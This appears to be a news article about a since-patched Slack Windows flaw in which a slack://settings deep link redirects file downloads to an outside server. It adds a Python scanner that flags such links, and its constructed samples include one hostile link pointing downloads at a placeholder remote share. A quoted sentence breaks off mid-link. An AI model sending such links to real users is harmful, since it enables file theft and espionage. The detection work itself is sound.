Time: 2025-04-06 14:16:34 Source: compiled from the web Editor: Hot Topics
A security researcher has uncovered a flaw in Slack that could've been exploited to steal files over the business messaging app and potentially spread malware.
The flaw involves Slack's Windows desktop app, and how it can automatically send downloaded files to a certain destination—whether it be on your PC or to an online storage server. You can set a download location in the app's preferences section. However, David Wells, a researcher at the security firm Tenable, noticed there's another way to configure the option: Via a special link.
"Crafting a link like 'slack://settings/?update={ 'PrefSSBFileDownloadPath':
Wells realized the same function could be abused. Imagine a hacker using the links to secretly reconfigure a Slack desktop app to send all downloaded files to an outside server. "Using this attack vector, an insider could exploit this vulnerability for corporate espionage, manipulation, or to gain access to documents outside of their purview," Wells' security firm Tenable said in a separate report.
The vulnerability can also pave the way for potential malware infections. Any downloaded files sent to the hacker-controlled server can be altered and booby-trapped to include malicious code. The attack will commence once the victim opens the file on the Slack desktop app.
The main obstacle to carrying out this attack is circulating the hacker-created links to people on Slack, which keeps its channels private to paying clients and their companies. To pull this off, Wells noted that Slack channels can be configured to subscribe to RSS feeds, including threads on Reddit.
"I could make a post to a very popular Reddit community that Slack users around the world are subscribed to," Wells said. The hacker-created link will then populate inside the Slack channel and possibly attract some clicks.
"This technique could be unmasked by savvy Slack users; however, if decades of phishing campaigns have taught us anything, it's that users click links, and when leveraged through an untrusted RSS feed, the impact can get much more interesting," he added.
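The two pieces above, a `slack://settings/?update=` link that sets `PrefSSBFileDownloadPath`, and untrusted RSS content being pulled into a channel, are exactly what a defender can look for in message text before version 3.4.0 is rolled out everywhere. The following is an added example, not code from the article, Tenable or Slack: it scans chat messages for settings deep links, decodes the `update` payload, and reports any link that tries to change the download path, marking whether the new path leaves the local machine. The sample messages are constructed; the hostnames in them are placeholders; and two things are assumptions rather than facts from the article: that the `update` value is a JSON-style object (the article's quote shows only the key name and single quotes), and that a UNC (`\\host\share`) or URL-style path is what "outside server" would look like in practice.

```python
"""Detect Slack settings deep links that redirect file downloads.

Added example (not the article's, Tenable's or Slack's code). The update
payload format beyond the PrefSSBFileDownloadPath key name, and the
"remote path" heuristic, are assumptions.
"""
import json
import re
from urllib.parse import parse_qs, urlsplit

# A settings deep link runs up to the next whitespace character.
SETTINGS_LINK = re.compile(r"slack://settings/\?\S+", re.IGNORECASE)

# Preference name taken from the article's quoted link.
DOWNLOAD_PATH_KEY = "PrefSSBFileDownloadPath"


def find_settings_links(text):
    """Return every slack://settings/ link in a message, trailing sentence punctuation removed."""
    return [m.group(0).rstrip(".,;:") for m in SETTINGS_LINK.finditer(text)]


def parse_update(link):
    """Decode the ``update`` query parameter as a JSON object.

    Accepts the single-quoted form shown in the article by retrying with
    double quotes (assumption about how such payloads are written).
    """
    values = parse_qs(urlsplit(link).query, keep_blank_values=True).get("update")
    if not values:
        return None
    raw = values[0]
    for candidate in (raw, raw.replace("'", '"')):
        try:
            payload = json.loads(candidate)
        except ValueError:
            continue
        if isinstance(payload, dict):
            return payload
    return None


def is_remote_path(path):
    """Heuristic (assumption): UNC shares and URL-like targets are not local folders."""
    return path.startswith("\\\\") or "://" in path


def classify_link(link):
    """Label one settings link by what its payload tries to change."""
    payload = parse_update(link)
    if payload is None:
        return "settings-link-unparseable"
    if DOWNLOAD_PATH_KEY not in payload:
        return "settings-update-other"
    target = str(payload[DOWNLOAD_PATH_KEY])
    if is_remote_path(target):
        return "download-path-redirect-remote"
    return "download-path-redirect-local"


def scan_messages(messages):
    """Return (message index, link, classification) for every settings link found."""
    findings = []
    for idx, text in enumerate(messages):
        for link in find_settings_links(text):
            findings.append((idx, link, classify_link(link)))
    return findings


# Constructed sample messages, e.g. items an RSS subscription posted into a channel.
SAMPLE_MESSAGES = [
    # Ordinary web link: not a settings deep link, must not be reported.
    "Reminder: the Q2 planning doc is at https://wiki.example.invalid/q2-plan",
    # Settings link pointing downloads at a UNC share (placeholder host).
    r"Free template pack, just click: slack://settings/?update={'PrefSSBFileDownloadPath':'\\\\files.example.invalid\\share'}",
    # Settings link that only moves downloads to another local folder.
    r"FYI: slack://settings/?update={%22PrefSSBFileDownloadPath%22:%22C:\\Users\\alice\\Downloads%22}.",
    # Settings link whose payload does not decode at all.
    "Try this: slack://settings/?update=not-json",
]

if __name__ == "__main__":
    for idx, link, label in scan_messages(SAMPLE_MESSAGES):
        print(f"message {idx}: {label}: {link}")
```

On the constructed messages the scanner ignores the plain web link and reports the other three, with only the second message classified as a remote redirect. In practice any link that touches `PrefSSBFileDownloadPath` is worth alerting on, whatever the target, since a legitimate user changes that setting in the preferences pane rather than by clicking a link in a channel.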
Slack has patched the flaw in version 3.4.0 of the Windows desktop app. "We investigated and found no indication that this vulnerability was ever utilized, nor reports that our users were impacted," the company said in an email.